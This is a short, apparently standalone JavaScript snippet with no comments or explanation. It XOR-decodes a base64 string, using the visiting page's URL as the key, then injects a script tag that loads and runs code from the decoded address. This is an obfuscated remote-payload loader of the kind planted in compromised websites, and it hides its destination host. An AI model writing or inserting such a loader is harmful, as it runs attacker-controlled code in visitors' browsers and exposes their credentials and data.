function xen(tx, ps) {
    var ord = [];
    var bff = "";
    for (sdF = 1; sdF <= 255; sdF++) {ord[String.fromCharCode(sdF)] = sdF}
    for (sdE = sdF = 0; sdF < tx.length; sdF++) {
        bff += String.fromCharCode(ord[tx.substr(sdF, 1)] ^ ord[ps.substr(sdE, 1)])
        sdE = (sdE < ps.length) ? sdE + 1 : 0
    }
    return bff
}
p = xen(atob('AAAAAAAAAAAcAEsfSwMBCwgQQhZUTBtaDA5AHRVWVl8bAkgKHF4GTA=='),window.location.href);
var sc = document.createElement('script');
sc.src = p;
document.head.appendChild(sc); 
